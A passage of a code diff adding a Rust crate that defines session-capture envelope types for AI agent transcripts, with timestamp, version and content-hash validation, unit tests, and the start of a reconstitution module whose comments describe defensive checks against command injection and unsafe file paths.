+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "raw": "transcript"
+        }"#;
+        let mut envelope: SessionEnvelope = serde_json::from_str(json).unwrap();
+        envelope.content_hash = Some(content_hash_for(&envelope).unwrap());
+        envelope
+            .validate_stored()
+            .expect("a store-computed hash must be a conformant stored envelope");
+    }
+}

--- a/standards/v1/APS-V1-0004-session-capture/src/lib.rs
+++ b/standards/v1/APS-V1-0004-session-capture/src/lib.rs
@@ -1,0 +1,737 @@
+//! Session Capture Standard (APS-V1-0004): definitional envelope types.
+//!
+//! This crate is DEFINITIONAL. It provides the session-envelope schema types,
+//! their structural validation, the embedded JSON Schema, and the reconstitution
+//! registry ([`reconstitution`]), shared by all three conformance profiles
+//! (Source, Exporter, Reconstitutor). The behavioural reference implementation
+//! (Source adapters, the exporter and CLI, the server-side sanitizer and
+//! per-provider parsers, the Reconstitutor client) lives in the SeshMagic
+//! repository, not here.
+//!
+//! Consumers depend on this crate rather than reimplementing the envelope, so a
+//! divergence from the standard surfaces as a build or test failure instead of an
+//! undetected drift. See `docs/01_spec.md` section 1.3.
+//!
+//! # The envelope
+//!
+//! A thin, universal header wrapped around a provider-native transcript that is
+//! preserved verbatim in [`SessionEnvelope::raw`]. The standard never parses or
+//! reshapes `raw`; it is opaque. See `docs/01_spec.md` section 4.
+//!
+//! Only the header fields and `raw` are required. `parent_session_id` and
+//! `metadata` are optional. `metadata` is freeform and first-class for search.
+//!
+//! # Example
+//!
+//! An envelope as a producer emits it: no `content_hash` (the store computes it
+//! at ingest, section 4.2.3), and `raw` as the transcript's verbatim bytes, which
+//! is what a reconstitutable `source_format` requires (section 4.3.1).
+//!
+//! ```
+//! use session_capture::{SessionEnvelope, content_hash_for};
+//!
+//! let json = r#"{
+//!   "scs_version": "1.0",
+//!   "origin": { "host": "macbook-neural", "environment": "local" },
+//!   "agent": "ClaudeCode",
+//!   "source_format": "claude-jsonl-v1",
+//!   "session_id": "019973e4-58a9-7b83-9f21-2b6c4d0a1e77",
+//!   "started_at": "2026-05-02T14:03:11Z",
+//!   "last_activity_at": "2026-05-02T15:20:44Z",
+//!   "raw": "{\"type\":\"user\",\"message\":\"hello\"}\n"
+//! }"#;
+//!
+//! let mut envelope: SessionEnvelope = serde_json::from_str(json).unwrap();
+//! envelope.validate().unwrap();
+//! assert_eq!(envelope.origin.environment, "local");
+//!
+//! // In flight there is no dedup key yet.
+//! assert!(envelope.idempotency_key().is_none());
+//!
+//! // What a store does at ingest, before sanitizing.
+//! envelope.content_hash = Some(content_hash_for(&envelope).unwrap());
+//! envelope.validate_stored().unwrap();
+//! ```
+
+use serde::{Deserialize, Serialize};
+
+pub mod cli;
+pub mod content_hash;
+pub mod reconstitution;
+
+pub use content_hash::{ContentHashError, content_hash_for};
+
+/// Standard identifier.
+pub const ID: &str = "APS-V1-0004";
+
+/// CLI dispatch slug.
+pub const SLUG: &str = "session-capture";
+
+/// Human-readable name.
+pub const NAME: &str = "Session Capture Standard";
+
+/// Short description.
+pub const DESCRIPTION: &str = "One capture contract so agent sessions from any runtime back up uniformly, stay searchable, and can be resumed on another machine";
+
+/// Version of this standard, kept in step with `Cargo.toml`.
+pub const VERSION: &str = env!("CARGO_PKG_VERSION");
+
+/// Register this standard with a composing CLI binary (APS-V1-0000.DI01).
+pub fn register(registry: &mut dyn apss_core::registry::StandardRegistry) {
+    registry.register(
+        apss_core::registry::RegisteredStandard {
+            id: ID.to_string(),
+            slug: SLUG.to_string(),
+            name: NAME.to_string(),
+            description: DESCRIPTION.to_string(),
+            version: VERSION.to_string(),
+            commands: cli::COMMAND_NAMES.iter().map(|s| s.to_string()).collect(),
+        },
+        Box::new(cli::SessionCaptureCommandHandler::new()),
+    );
+}
+
+/// The envelope schema version this crate implements (section 4.2).
+///
+/// `MAJOR.MINOR`, additive-only within a major. Note the form: it is `"1.0"`,
+/// NOT a prefixed string such as `"scs/1"`, which does not match the schema's
+/// `scs_version` pattern and is therefore non-conformant.
+pub const SCS_VERSION: &str = "1.0";
+
+/// The standard's JSON Schema for a session envelope, embedded verbatim.
+///
+/// Consumers validate against this rather than shipping their own copy, so a
+/// drift from the standard is a test failure instead of an undetected
+/// divergence (section 1.3).
+pub const SESSION_ENVELOPE_SCHEMA: &str = include_str!("../schemas/session-envelope.schema.json");
+
+/// Parse [`SESSION_ENVELOPE_SCHEMA`] into a [`serde_json::Value`].
+///
+/// # Panics
+///
+/// Panics if the embedded schema is not valid JSON, which would mean the
+/// shipped package is corrupt. A freshness test in `tests/` covers this.
+pub fn session_envelope_schema() -> serde_json::Value {
+    serde_json::from_str(SESSION_ENVELOPE_SCHEMA).expect("embedded schema must be valid JSON")
+}
+
+/// A single Session Capture envelope (APS-V1-0004 section 4).
+///
+/// The header fields and [`raw`](SessionEnvelope::raw) are required.
+/// `parent_session_id` and `metadata` are optional.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct SessionEnvelope {
+    /// SemVer of the envelope schema (`MAJOR.MINOR`). Additive-only within a major.
+    pub scs_version: String,
+    /// Where the envelope came from. Keeps a multi-source corpus attributable.
+    pub origin: Origin,
+    /// The producing runtime, for example `ClaudeCode`, `Codex`, `Cursor`.
+    pub agent: String,
+    /// Provenance tag for `raw`: how a server-side parser should read it.
+    pub source_format: String,
+    /// Session identifier, stable per source. Half of the idempotency key.
+    pub session_id: String,
+    /// For a subagent session, the parent's id. Reserved in v1.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub parent_session_id: Option<String>,
+    /// Real session start time (RFC3339), derived from the transcript.
+    pub started_at: String,
+    /// Real time of the last activity (RFC3339).
+    pub last_activity_at: String,
+    /// Content hash (`algo:hexdigest`) over the captured content, computed by
+    /// the store at ingest before sanitizing (section 4.2.3).
+    ///
+    /// `None` while in flight: the store's value is authoritative, so producers
+    /// omit it. `Some` once stored. Use [`SessionEnvelope::validate_stored`] to
+    /// require it.
+    ///
+    /// This is a dedup identity, NOT an integrity check over the stored bytes:
+    /// the stored form is sanitized and may be re-sanitized later, while this
+    /// digest deliberately does not move.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub content_hash: Option<String>,
+    /// Freeform, non-load-bearing metadata; first-class for search.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub metadata: Option<Metadata>,
+    /// The provider-native transcript, preserved verbatim. Opaque to the standard.
+    pub raw: serde_json::Value,
+}
+
+/// Where an envelope came from (APS-V1-0004 section 4.2.1).
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct Origin {
+    /// Human-meaningful host identity.
+    pub host: String,
+    /// Environment class: `local`, `vps`, `container`, or `workflow`.
+    /// Consumers MUST tolerate unknown values (section 8.3), so this stays a
+    /// `String` rather than a closed enum.
+    pub environment: String,
+}
+
+/// Freeform, first-class-for-search metadata (APS-V1-0004 section 4.4).
+///
+/// Every field is optional. Unknown keys are preserved in [`Metadata::extra`]
+/// so additive evolution does not lose data.
+#[derive(Debug, Clone, Default, Serialize, Deserialize)]
+pub struct Metadata {
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub repo: Option<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub git_remote: Option<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub cwd: Option<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub project: Option<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub model: Option<String>,
+    #[serde(default, skip_serializing_if = "Vec::is_empty")]
+    pub tags: Vec<String>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub message_count: Option<u64>,
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub workflow_id: Option<String>,
+    /// Original transcript path on the capturing machine, relative to the
+    /// harness session root (section 4.4). Preferred by a Reconstitutor over a
+    /// derived path.
+    ///
+    /// UNTRUSTED producer input used to choose a filesystem write location.
+    /// Resolve it with [`reconstitution::resolve_within_root`], which performs
+    /// both the lexical and the filesystem-aware containment checks;
+    /// [`reconstitution::is_safe_source_path`] alone cannot see symlinks.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub source_path: Option<String>,
+    /// Unknown metadata keys, tolerated per section 8.3.
+    #[serde(flatten)]
+    pub extra: serde_json::Map<String, serde_json::Value>,
+}
+
+/// A structural validation error for an envelope.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum ValidationError {
+    /// A required header field was empty.
+    EmptyField(&'static str),
+    /// `content_hash` did not match the `algo:hexdigest` shape.
+    MalformedContentHash,
+    /// A stored envelope had no `content_hash` (section 4.2.3).
+    ///
+    /// Legal in flight, non-conformant once persisted: the store must compute
+    /// it during ingest.
+    MissingStoredContentHash,
+    /// `raw` was a scalar (number, boolean, or null) rather than an object,
+    /// array, or string (section 4.3).
+    ///
+    /// A scalar cannot be a transcript. The schema restricts the same three
+    /// types; this keeps the Rust type domain from being wider than the schema's.
+    InvalidRawType,
+    /// A timestamp was not RFC3339 (section 4.2.2).
+    ///
+    /// Carries the field name, since both `started_at` and `last_activity_at`
+    /// are checked.
+    MalformedTimestamp(&'static str),
+    /// `scs_version` was not `MAJOR.MINOR` (section 4.2).
+    ///
+    /// This exists to catch a specific real drift: a producer emitting a
+    /// prefixed form such as `"scs/1"` instead of `"1.0"`. That value does not
+    /// match the schema's `scs_version` pattern, so every envelope carrying it
+    /// is non-conformant.
+    MalformedScsVersion,
+}
+
+impl std::fmt::Display for ValidationError {
+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            ValidationError::EmptyField(name) => {
+                write!(f, "required field `{name}` must not be empty")
+            }
+            ValidationError::MalformedContentHash => {
+                write!(f, "content_hash must be of the form `algo:hexdigest`")
+            }
+            ValidationError::InvalidRawType => {
+                write!(
+                    f,
+                    "raw must be an object, array, or string; a scalar is not a transcript"
+                )
+            }
+            ValidationError::MalformedTimestamp(name) => {
+                write!(
+                    f,
+                    "`{name}` must be an RFC3339 date-time, for example 2026-05-02T14:03:11Z"
+                )
+            }
+            ValidationError::MissingStoredContentHash => {
+                write!(
+                    f,
+                    "a stored envelope must carry a content_hash computed by the store over the captured content"
+                )
+            }
+            ValidationError::MalformedScsVersion => {
+                write!(
+                    f,
+                    "scs_version must be `MAJOR.MINOR` (for example `1.0`), not a prefixed form such as `scs/1`"
+                )
+            }
+        }
+    }
+}
+
+impl std::error::Error for ValidationError {}
+
+impl SessionEnvelope {
+    /// Structurally validate the envelope beyond what deserialization enforces.
+    ///
+    /// Deserialization already guarantees the required fields are present and
+    /// typed. This checks that required string fields are non-empty and that
+    /// `content_hash` follows the `algo:hexdigest` shape. It deliberately does
+    /// NOT inspect `raw`, which is opaque to the standard.
+    pub fn validate(&self) -> Result<(), ValidationError> {
+        for (name, value) in [
+            ("scs_version", &self.scs_version),
+            ("agent", &self.agent),
+            ("source_format", &self.source_format),
+            ("session_id", &self.session_id),
+            ("started_at", &self.started_at),
+            ("last_activity_at", &self.last_activity_at),
+            ("origin.host", &self.origin.host),
+            ("origin.environment", &self.origin.environment),
+        ] {
+            if value.trim().is_empty() {
+                return Err(ValidationError::EmptyField(name));
+            }
+        }
+        if !is_valid_scs_version(&self.scs_version) {
+            return Err(ValidationError::MalformedScsVersion);
+        }
+        for (name, value) in [
+            ("started_at", &self.started_at),
+            ("last_activity_at", &self.last_activity_at),
+        ] {
+            if !is_rfc3339(value) {
+                return Err(ValidationError::MalformedTimestamp(name));
+            }
+        }
+        if !matches!(
+            self.raw,
+            serde_json::Value::Object(_)
+                | serde_json::Value::Array(_)
+                | serde_json::Value::String(_)
+        ) {
+            return Err(ValidationError::InvalidRawType);
+        }
+        if let Some(hash) = &self.content_hash
+            && !is_valid_content_hash(hash)
+        {
+            return Err(ValidationError::MalformedContentHash);
+        }
+        Ok(())
+    }
+
+    /// Validate an envelope that has been persisted by a store (section 4.2.3).
+    ///
+    /// Everything [`validate`](SessionEnvelope::validate) checks, plus the
+    /// requirement that `content_hash` is present. A store MUST populate it
+    /// during ingest, so an envelope read back without one is non-conformant.
+    pub fn validate_stored(&self) -> Result<(), ValidationError> {
+        self.validate()?;
+        if self.content_hash.is_none() {
+            return Err(ValidationError::MissingStoredContentHash);
+        }
+        Ok(())
+    }
+
+    /// The idempotency key: `(session_id, content_hash)` (section 5.3).
+    ///
+    /// `None` for an in-flight envelope, whose hash the store has not yet
+    /// computed. Dedup is therefore a store-side operation (4.2.3).
+    pub fn idempotency_key(&self) -> Option<(&str, &str)> {
+        self.content_hash
+            .as_deref()
+            .map(|hash| (self.session_id.as_str(), hash))
+    }
+}
+
+/// Days in a month, accounting for leap years per the proleptic Gregorian rule.
+fn days_in_month(year: u32, month: u32) -> u32 {
+    match month {
+        1 | 3 | 5 | 7 | 8 | 10 | 12 => 31,
+        4 | 6 | 9 | 11 => 30,
+        2 => {
+            // `%` rather than `is_multiple_of`, which is newer than the
+            // workspace MSRV of 1.85.
+            if year % 4 == 0 && (year % 100 != 0 || year % 400 == 0) {
+                29
+            } else {
+                28
+            }
+        }
+        _ => 0,
+    }
+}
+
+/// Check that a timestamp is RFC3339 (section 4.2.2).
+///
+/// Validates the full grammar including real month lengths and leap years, so
+/// `2026-02-31T12:00:00Z` is rejected rather than merely being implausible.
+/// Second 60 is accepted only at `23:59:60` in the value's own offset, which is
+/// where RFC3339 permits a leap second.
+fn is_rfc3339(value: &str) -> bool {
+    let bytes = value.as_bytes();
+    // Minimum: 1970-01-01T00:00:00Z
+    if bytes.len() < 20 {
+        return false;
+    }
+    let digits = |range: std::ops::Range<usize>| bytes[range].iter().all(u8::is_ascii_digit);
+    if !(digits(0..4) && bytes[4] == b'-' && digits(5..7) && bytes[7] == b'-' && digits(8..10)) {
+        return false;
+    }
+    if bytes[10] != b'T' && bytes[10] != b't' {
+        return false;
+    }
+    if !(digits(11..13)
+        && bytes[13] == b':'
+        && digits(14..16)
+        && bytes[16] == b':'
+        && digits(17..19))
+    {
+        return false;
+    }
+    let num = |range: std::ops::Range<usize>| value[range].parse::<u32>().unwrap_or(u32::MAX);
+    let (year, month, day) = (num(0..4), num(5..7), num(8..10));
+    if !(1..=12).contains(&month) || day < 1 || day > days_in_month(year, month) {
+        return false;
+    }
+    // 24:00:00 is not permitted by RFC3339. Second 60 is a leap second, valid
+    // only at the final second of a day (23:59:60 in the stated offset).
+    let (hour, minute, second) = (num(11..13), num(14..16), num(17..19));
+    if hour > 23 || minute > 59 || second > 60 {
+        return false;
+    }
+    // A leap second occurs at 23:59:60 UTC, which in a non-zero offset is written
+    // as the offset-equivalent local time. RFC3339 section 5.8 gives
+    // `1990-12-31T15:59:60-08:00` as a valid example, so requiring local 23:59
+    // would reject conformant timestamps. Defer the check until the offset is
+    // known, below.
+    let is_leap_second = second == 60;
+
+    let mut rest = &value[19..];
+    // Optional fractional seconds.
+    if let Some(stripped) = rest.strip_prefix('.') {
+        let frac_len = stripped.chars().take_while(char::is_ascii_digit).count();
+        if frac_len == 0 {
+            return false;
+        }
+        rest = &stripped[frac_len..];
+    }
+    // Offset is REQUIRED: `Z`, or +/-HH:MM.
+    let (offset_hours, offset_minutes, offset_sign) = if rest == "Z" || rest == "z" {
+        (0i32, 0i32, 1i32)
+    } else {
+        let offset = rest.as_bytes();
+        if offset.len() != 6 || (offset[0] != b'+' && offset[0] != b'-') || offset[3] != b':' {
+            return false;
+        }
+        if !offset[1..3].iter().all(u8::is_ascii_digit)
+            || !offset[4..6].iter().all(u8::is_ascii_digit)
+        {
+            return false;
+        }
+        let hours = rest[1..3].parse::<i32>().unwrap_or(i32::MAX);
+        let minutes = rest[4..6].parse::<i32>().unwrap_or(i32::MAX);
+        if hours > 23 || minutes > 59 {
+            return false;
+        }
+        (hours, minutes, if offset[0] == b'-' { -1 } else { 1 })
+    };
+
+    if is_leap_second {
+        // Convert the stated local time to UTC minutes-of-day; a leap second is
+        // only valid at 23:59:60 UTC.
+        let local_minutes = (hour as i32) * 60 + minute as i32;
+        let offset_total = offset_sign * (offset_hours * 60 + offset_minutes);
+        let utc_minutes = (local_minutes - offset_total).rem_euclid(24 * 60);
+        if utc_minutes != 23 * 60 + 59 {
+            return false;
+        }
+    }
+    true
+}
+
+/// Check that `scs_version` is `MAJOR.MINOR`, matching the schema's pattern
+/// `^[0-9]+\.[0-9]+$`.
+fn is_valid_scs_version(version: &str) -> bool {
+    match version.split_once('.') {
+        Some((major, minor)) => {
+            !major.is_empty()
+                && !minor.is_empty()
+                && major.chars().all(|c| c.is_ascii_digit())
+                && minor.chars().all(|c| c.is_ascii_digit())
+        }
+        None => false,
+    }
+}
+
+/// Check that a content hash is of the form `algo:hexdigest`.
+fn is_valid_content_hash(hash: &str) -> bool {
+    // Exactly `sha256:` plus 64 lowercase hex digits. Within scs_version 1.x the
+    // algorithm is fixed (section 4.2.3): allowing others would let two stores
+    // produce different identities for identical content. Casing is fixed for
+    // the same reason, since dedup compares these as strings.
+    let Some(digest) = hash.strip_prefix("sha256:") else {
+        return false;
+    };
+    digest.len() == 64
+        && digest
+            .chars()
+            .all(|c| c.is_ascii_digit() || ('a'..='f').contains(&c))
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn valid_json() -> &'static str {
+        r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "macbook-neural", "environment": "local" },
+          "agent": "ClaudeCode",
+          "source_format": "claude-jsonl-v1",
+          "session_id": "abc-123",
+          "parent_session_id": null,
+          "started_at": "2026-05-02T14:03:11Z",
+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "content_hash": "sha256:deadbeef01000000000000000000000000000000000000000000000000000000",
+          "metadata": { "repo": "owner/name", "tags": ["a", "b"], "message_count": 42 },
+          "raw": { "messages": [] }
+        }"#
+    }
+
+    #[test]
+    fn parses_and_validates_a_full_envelope() {
+        let env: SessionEnvelope = serde_json::from_str(valid_json()).unwrap();
+        assert!(env.validate().is_ok());
+        assert_eq!(
+            env.idempotency_key(),
+            Some((
+                "abc-123",
+                "sha256:deadbeef01000000000000000000000000000000000000000000000000000000"
+            ))
+        );
+        let md = env.metadata.unwrap();
+        assert_eq!(md.repo.as_deref(), Some("owner/name"));
+        assert_eq!(md.tags, vec!["a", "b"]);
+        assert_eq!(md.message_count, Some(42));
+    }
+
+    #[test]
+    fn minimal_envelope_without_optional_fields_is_valid() {
+        let json = r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "h", "environment": "vps" },
+          "agent": "Codex",
+          "source_format": "codex-turns-v1",
+          "session_id": "s1",
+          "started_at": "2026-05-02T14:03:11Z",
+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "content_hash": "sha256:00ff000000000000000000000000000000000000000000000000000000000000",
+          "raw": "opaque string transcript"
+        }"#;
+        let env: SessionEnvelope = serde_json::from_str(json).unwrap();
+        assert!(env.validate().is_ok());
+        assert!(env.metadata.is_none());
+        assert!(env.parent_session_id.is_none());
+    }
+
+    #[test]
+    fn raw_is_preserved_verbatim_and_untouched() {
+        let env: SessionEnvelope = serde_json::from_str(valid_json()).unwrap();
+        // The standard never reshapes `raw`; it round-trips as-is.
+        assert_eq!(env.raw, serde_json::json!({ "messages": [] }));
+    }
+
+    #[test]
+    fn unknown_metadata_keys_are_tolerated() {
+        let json = r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "h", "environment": "container" },
+          "agent": "Cursor",
+          "source_format": "cursor-bubbles-v1",
+          "session_id": "s2",
+          "started_at": "2026-05-02T14:03:11Z",
+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "content_hash": "sha256:abcd000000000000000000000000000000000000000000000000000000000000",
+          "metadata": { "repo": "o/n", "future_field": 123 },
+          "raw": {}
+        }"#;
+        let env: SessionEnvelope = serde_json::from_str(json).unwrap();
+        let md = env.metadata.unwrap();
+        assert_eq!(md.extra.get("future_field"), Some(&serde_json::json!(123)));
+    }
+
+    #[test]
+    fn empty_required_field_is_rejected() {
+        let mut env: SessionEnvelope = serde_json::from_str(valid_json()).unwrap();
+        env.agent = String::new();
+        assert_eq!(env.validate(), Err(ValidationError::EmptyField("agent")));
+    }
+
+    #[test]
+    fn the_shipped_scs_version_constant_is_conformant() {
+        assert_eq!(SCS_VERSION, "1.0");
+        assert!(is_valid_scs_version(SCS_VERSION));
+    }
+
+    #[test]
+    fn prefixed_scs_version_is_rejected() {
+        let mut env: SessionEnvelope = serde_json::from_str(valid_json()).unwrap();
+        // The exact drift this catches: a producer emitting `scs/1`.
+        env.scs_version = "scs/1".to_string();
+        assert_eq!(env.validate(), Err(ValidationError::MalformedScsVersion));
+
+        for bad in ["1", "v1.0", "1.0.0", "1.", ".0"] {
+            env.scs_version = bad.to_string();
+            assert_eq!(
+                env.validate(),
+                Err(ValidationError::MalformedScsVersion),
+                "must reject scs_version {bad:?}"
+            );
+        }
+
+        // An empty version is caught by the earlier emptiness check, which is a
+        // more precise diagnostic than "malformed".
+        env.scs_version = String::new();
+        assert_eq!(
+            env.validate(),
+            Err(ValidationError::EmptyField("scs_version"))
+        );
+    }
+
+    #[test]
+    fn source_path_round_trips_through_metadata() {
+        let json = r#"{
+          "scs_version": "1.0",
+          "origin": { "host": "h", "environment": "local" },
+          "agent": "Codex",
+          "source_format": "codex-turns-v1",
+          "session_id": "s1",
+          "started_at": "2026-05-02T14:03:11Z",
+          "last_activity_at": "2026-05-02T15:20:44Z",
+          "content_hash": "sha256:00ff000000000000000000000000000000000000000000000000000000000000",
+          "metadata": { "source_path": "2026/06/04/rollout-x.jsonl" },
+          "raw": {}
+        }"#;
+        let env: SessionEnvelope = serde_json::from_str(json).unwrap();
+        let md = env.metadata.unwrap();
+        assert_eq!(
+            md.source_path.as_deref(),
+            Some("2026/06/04/rollout-x.jsonl")
+        );
+    }
+
+    #[test]
+    fn timestamps_are_validated_against_the_real_calendar() {
+        let mut env: SessionEnvelope = serde_json::from_str(valid_json()).unwrap();
+        for good in [
+            "2026-05-02T14:03:11Z",
+            "2026-05-02t14:03:11z",
+            "2024-02-29T00:00:00Z",      // leap year
+            "2026-05-02T14:03:11.123Z",  // fractional seconds
+            "2026-05-02T14:03:11+02:00", // offset
+            "2026-05-02T14:03:11-08:00",
+            "2016-12-31T23:59:60Z", // leap second at end of UTC day
+            // RFC3339 section 5.8's own example: the same leap-second instant
+            // expressed in a non-zero offset. Requiring local 23:59 would
+            // wrongly reject this.
+            "1990-12-31T15:59:60-08:00",
+            "1990-12-31T23:59:60+00:00",
+        ] {
+            env.started_at = good.to_string();
+            assert!(env.validate().is_ok(), "must accept RFC3339 {good}");
+        }
+        for bad in [
+            "2026-02-31T12:00:00Z",      // February has no 31st
+            "2025-02-29T12:00:00Z",      // 2025 is not a leap year
+            "1900-02-29T12:00:00Z",      // century non-leap year
+            "2026-04-31T12:00:00Z",      // April has 30 days
+            "2026-01-01T12:00:60Z",      // leap second not at end of UTC day
+            "1990-12-31T15:59:60-07:00", // offset does not land on 23:59 UTC
+            "2026-01-01T24:00:00Z",      // hour 24 is not RFC3339
+            "2026-13-01T12:00:00Z",      // month 13
+            "2026-00-01T12:00:00Z",      // month 0
+            "2026-01-00T12:00:00Z",      // day 0
+            "2026-05-02 14:03:11Z",      // space instead of T
+            "2026-05-02T14:03:11",       // offset is required
+            "2026-05-02T14:03:11.Z",     // empty fraction
+            "2026-05-02T14:03:11+2:00",
+            "2026-05-02T14:03:11+02:60",
+            "not-a-timestamp",
+        ] {
+            env.started_at = bad.to_string();
+            assert_eq!(
+                env.validate(),
+                Err(ValidationError::MalformedTimestamp("started_at")),
+                "must reject non-RFC3339 {bad}"
+            );
+        }
+    }
+
+    #[test]
+    fn scalar_raw_is_rejected() {
+        let mut env: SessionEnvelope = serde_json::from_str(valid_json()).unwrap();
+        for scalar in [
+            serde_json::json!(42),
+            serde_json::json!(true),
+            serde_json::Value::Null,
+        ] {
+            env.raw = scalar.clone();
+            assert_eq!(
+                env.validate(),
+                Err(ValidationError::InvalidRawType),
+                "a scalar is not a transcript: {scalar}"
+            );
+        }
+        for ok in [
+            serde_json::json!({}),
+            serde_json::json!([]),
+            serde_json::Value::String(String::new()),
+        ] {
+            env.raw = ok;
+            assert!(env.validate().is_ok());
+        }
+    }
+
+    #[test]
+    fn malformed_content_hash_is_rejected() {
+        let mut env: SessionEnvelope = serde_json::from_str(valid_json()).unwrap();
+        env.content_hash = Some("not-a-hash".to_string());
+        assert_eq!(env.validate(), Err(ValidationError::MalformedContentHash));
+
+        env.content_hash = Some("sha256:xyz".to_string()); // non-hex digest
+        assert_eq!(env.validate(), Err(ValidationError::MalformedContentHash));
+    }
+
+    #[test]
+    fn in_flight_envelope_omits_the_hash_but_a_stored_one_requires_it() {
+        let mut env: SessionEnvelope = serde_json::from_str(valid_json()).unwrap();
+
+        // In flight: the producer cannot compute the hash (section 4.2.3).
+        env.content_hash = None;
+        env.validate()
+            .expect("an in-flight envelope without a hash is conformant");
+        assert_eq!(
+            env.idempotency_key(),
+            None,
+            "no hash means no dedup key yet"
+        );
+        assert_eq!(
+            env.validate_stored(),
+            Err(ValidationError::MissingStoredContentHash),
+            "but a stored envelope must carry one"
+        );
+
+        // Stored: the store has computed it over the captured content.
+        env.content_hash = Some(
+            "sha256:deadbeef01000000000000000000000000000000000000000000000000000000".to_string(),
+        );
+        env.validate_stored()
+            .expect("a stored envelope with a hash is conformant");
+    }
+}

--- a/standards/v1/APS-V1-0004-session-capture/src/reconstitution.rs
+++ b/standards/v1/APS-V1-0004-session-capture/src/reconstitution.rs
@@ -1,0 +1,836 @@
+//! The reconstitution registry and its safety checks (APS-V1-0004 section 6.4).
+//!
+//! A Reconstitutor restores a stored session onto a machine so the originating
+//! harness can resume it natively. This module ships the per-`source_format`
+//! knowledge that requires (section 6.4.2) plus the validation every
+//! Reconstitutor must perform on untrusted envelope input (section 6.4.5).
+//!
+//! The registry is INFORMATIVE and separately versioned. Harnesses change their
+//! on-disk layout on their own schedule; a stale entry is a registry correction,
+//! never a change to the envelope contract (section 8.2).
+//!
+//! # Why the validation lives here
+//!
+//! `session_id` and `metadata.source_path` both come from producers, and push
+//! producers are untrusted (section 10.3). A Reconstitutor interpolates the
+//! first into a resume command and uses the second to choose a filesystem write
+//! location. Getting either check wrong is a remote code execution or an
+//! arbitrary file write. Shipping the checks in the standard's own crate means
+//! every consumer inherits one implementation instead of writing its own.
+//!
+//! # What this module does and does not guarantee
+//!
+//! Be precise about the boundary, because "the crate handles it" is exactly the
+//! assumption that produces vulnerabilities:
+//!
+//! - [`Entry::validate_session_id`] matches the registry's pattern and
+//!   additionally enforces an ASCII identifier charset. Combined with a resume
+//!   descriptor invoked WITHOUT a shell, this is sufficient against command
+//!   injection. It is NOT sufficient if a caller joins the descriptor into a
+//!   shell string; do not do that.
+//! - [`is_safe_source_path`] is a LEXICAL check only. It cannot see symlinks.
+//! - [`resolve_within_root`] adds filesystem resolution and is what a caller
+//!   should actually use before writing. It still carries a time-of-check to
+//!   time-of-use caveat, documented on that function.
+//!
+//! Nothing here sandboxes the resumed process. Once a harness resumes, it runs
+//! with the invoking user's privileges.
+
+use serde::Deserialize;
+use std::collections::BTreeMap;
+
+/// The shipped registry source, embedded verbatim.
+pub const REGISTRY_TOML: &str = include_str!("../registry/reconstitution.toml");
+
+/// The reconstitution registry: `source_format` to restore knowledge.
+#[derive(Debug, Clone, Deserialize)]
+pub struct Registry {
+    /// Version of the registry itself, independent of `scs_version`.
+    pub registry_version: String,
+    /// Entries keyed by `source_format`.
+    #[serde(flatten)]
+    pub entries: BTreeMap<String, Entry>,
+}
+
+/// One harness's restore knowledge (section 6.4.2).
+#[derive(Debug, Clone, Deserialize)]
+pub struct Entry {
+    /// The producing harness, matching the envelope's `agent` where applicable.
+    pub harness: String,
+    /// Human-readable note on the harness's on-disk layout.
+    pub description: String,
+    /// Where the harness expects the session file, as a template.
+    pub path_template: String,
+    /// How `raw` is written back to disk, for example `jsonl`.
+    pub serialization: String,
+    /// Anchored regex-style shape a `session_id` must match before use.
+    pub session_id_pattern: String,
+    /// Whether `metadata.source_path` should be preferred over the template.
+    #[serde(default)]
+    pub prefer_source_path: bool,
+    /// How the harness derives a directory slug from a working directory.
+    pub slug_rule: SlugRule,
+    /// The structured resume descriptor. Never a shell string.
+    pub resume: Resume,
+}
+
+/// How a harness derives its session directory slug from a working directory.
+#[derive(Debug, Clone, Deserialize)]
+pub struct SlugRule {
+    /// `cwd_absolute` to derive from the absolute cwd, `none` if the harness
+    /// does not partition by working directory.
+    pub source: String,
+    /// Ordered literal replacements applied to the path, as `[from, to]` pairs.
+    #[serde(default)]
+    pub replace: Vec<(String, String)>,
+}
+
+/// A structured resume descriptor (section 6.4.5).
+///
+/// Deliberately a program plus an argument vector, never a single command
+/// string: a Reconstitutor invokes it WITHOUT a shell, so interpolated values
+/// cannot inject additional commands.
+#[derive(Debug, Clone, Deserialize)]
+pub struct Resume {
+    /// The program to execute, for example `claude`.
+    pub program: String,
+    /// Argument templates, for example `["--resume", "{session_id}"]`.
+    pub args: Vec<String>,
+    /// Working directory template for the resumed process.
+    pub cwd: String,
+}
+
+/// Errors from loading or using the registry.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum RegistryError {
+    /// No entry exists for the given `source_format`.
+    ///
+    /// This is the correct outcome for a harness that cannot be reconstituted
+    /// (Cursor, which keeps sessions in SQLite rather than per-session files).
+    /// A Reconstitutor MUST fail loudly here rather than guess a path
+    /// (section 6.4.3).
+    UnknownSourceFormat(String),
+    /// The `session_id` did not match the entry's expected shape.
+    InvalidSessionId,
+    /// `metadata.source_path` was absolute or escaped the harness root.
+    UnsafeSourcePath,
+}
+
+impl std::fmt::Display for RegistryError {
